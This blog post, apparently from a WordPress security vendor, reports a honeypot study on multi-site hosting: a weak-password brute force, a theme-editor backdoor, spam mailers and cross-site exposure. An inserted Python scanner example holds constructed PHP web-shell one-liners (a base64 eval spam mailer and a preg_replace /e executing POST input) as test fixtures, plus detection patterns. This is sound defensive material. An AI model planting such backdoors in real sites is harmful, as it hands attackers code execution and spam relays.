Multi-site hosting security issues have recently attracted more attention. Multi-site hosting plans allow you to host more than one website on a single hosting account. It’s a convenient solution that simplifies administration at a lower cost, provided you don’t need extra CPU or memory resources to sustain a high-traffic website.
However, from a security perspective, it can be risky. We recently ran several “honeypot” websites just to observe attacks on WordPress sites with various vulnerabilities and low-security settings.
Setting up honeypot sites to work as bait
First of all, we bought a multi-site hosting plan. We dedicated two domain names to this experiment and deployed eight websites in total: two on the domain names themselves and three subdomain sites under each domain.
All these websites were filled with dummy content and various vulnerabilities. Several sites ran outdated WordPress software, several had weak passwords and no captcha, and several had multiple vulnerabilities related to directory and file permissions, file access control and more.
We installed additional software to trace absolutely everything that happened on the server. All requests and other data necessary for the investigation were recorded in the smallest detail.
We then left everything alone for a while to give search engines time to index these websites and attackers time to find them.
Nature of attacks and results
After a few weeks we received a notice from the hosting company that the php_mail function had been disabled for our account because there were signs that the account was being used to send spam email in large quantities.
The hosting company’s notice was the signal that the security of one of the websites had been breached, and we could now look at the logged data to see what had happened.
First of all, we need to mention that the attacks were carried out automatically by software tools. We know this from the huge number of requests made in a brief period. The second, and quite important, point is that the breach occurred on the website with a weak password. Password picking, guessing or brute-forcing is one of the simplest and most popular types of attack. That’s why WordPress suggests you use strong passwords for WordPress user accounts.
By analyzing the content of the files with our malware scanner (still in beta, but under rapid development, and soon to be available to everyone) we noticed that a lot of new files had been created.
The attacker managed to crack the password of the single available WordPress user with admin rights. The username is easy to find just by looking at the author of the blog posts. The attacker then placed a backdoor shell in one of the WordPress theme files using the theme editor, and used that shell to connect to the server and create new files or alter the original ones. There were several files containing shells and several for sending spam email. A lot of files and directories had the same “last edited” date, even those that were untouched. We think this was done on purpose, to make it harder to find the files that were altered or created by the attacker by filtering on the “last edited” date.
Almost all of the malicious code was written using regular expressions and packed with base64 encoding. It’s harder for an amateur WordPress user to understand what this code does, but it was easy for our malware scanner to find the malicious code by comparing it to the malware patterns in our malware database.
You can see what it looks like when decoded from the base64 package. Someone put a lot of time and knowledge into building this piece of malicious software. This code gave us a lot of new information, and we have updated our malware database with several new patterns.
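As an added example (not code from this post or from the authors’ scanner), here is a small Python check for the two traits described above, base64-wrapped payloads and regex-based (preg_replace /e) execution, which relies on a hash baseline rather than the “last edited” date, since that date was tampered with. The sample files, paths and signature names are constructed for illustration.

```python
import base64
import hashlib
import re

# Signatures for the two traits described above: base64-wrapped payloads and
# regex-based execution. Names are ours, not the post's own pattern database.
SIGNATURES = {
    "eval of decoded payload": re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\("),
    "preg_replace with /e modifier": re.compile(r"preg_replace\s*\(\s*(['\"]).*?/[a-zA-Z]*e[a-zA-Z]*\1"),
}
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]")
RISKY_CALLS = re.compile(r"\b(eval|mail|system|shell_exec|passthru)\b")

def sha256(text):
    return hashlib.sha256(text.encode()).hexdigest()

def scan(files, baseline):
    """Return {path: [findings]}; mtime is ignored on purpose because the attacker rewrote it."""
    report = {}
    for path, body in files.items():
        findings = []
        if path not in baseline:
            findings.append("not in baseline (new file)")
        elif baseline[path] != sha256(body):
            findings.append("hash differs from baseline (modified)")
        findings += [label for label, rx in SIGNATURES.items() if rx.search(body)]
        for blob in B64_LITERAL.findall(body):  # decode base64 literals and look inside
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
            except ValueError:
                continue
            hit = RISKY_CALLS.search(decoded)
            if hit:
                findings.append(f"decoded base64 calls {hit.group(1)}()")
        if findings:
            report[path] = findings
    return report

# Constructed sample files for three sites sharing one public_html (not real captures).
CLEAN = "<?php\nadd_action('init', 'theme_setup');\n"
PAYLOAD = base64.b64encode(b"mail($_POST['t'], $_POST['s'], $_POST['b']);").decode()
SAMPLE_FILES = {
    "public_html/wp-content/themes/t/functions.php": CLEAN,
    "public_html/site2/wp-content/themes/t/header.php": f"<?php eval(base64_decode('{PAYLOAD}')); ?>",
    "public_html/site3/wp-includes/cache.php": "<?php @preg_replace('/.*/e', $_POST['c'], ''); ?>",
}
BASELINE = {
    "public_html/wp-content/themes/t/functions.php": sha256(CLEAN),
    "public_html/site2/wp-content/themes/t/header.php": sha256("<?php get_header(); ?>"),
}
```

Calling scan(SAMPLE_FILES, BASELINE) flags the modified theme file and the new file in the third site while leaving the untouched functions.php out of the report.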
Multi-site hosting security risks
Now the worst part. If you have had multi-site hosting, you will have noticed how it handles the directories and files for each website. You have a “public_html” directory which holds the files of the main website (domain). The files of the other sites are stored in separate subdirectories under that root “public_html” directory. This means that all data for all sites is stored in the same directory tree, and here comes the worst part – if one of your websites gets hacked, all the other websites can be hacked without any additional effort.
An attacker could access all files of all WordPress sites on the same account simply by running a shell that connects to the server. The attacker could gain access to any directory or file, make changes, or even create and delete files. There are no isolated environments for each site on multi-site hosting; everything sits on the same server, in the same “public_html” root directory.
If you have several projects hosted on the same multi-site hosting account, please make sure all of them are protected equally well. Your multi-site hosting security, or more accurately the security of the WordPress sites hosted on the same multi-site hosting account, is only as strong as the site with the weakest level of security. If that site is hacked, all the other websites on the same account can be hacked instantly. We suggest you harden all WordPress installations equally, or use separate individual hosting accounts for each site if they hold sensitive information and are important to you.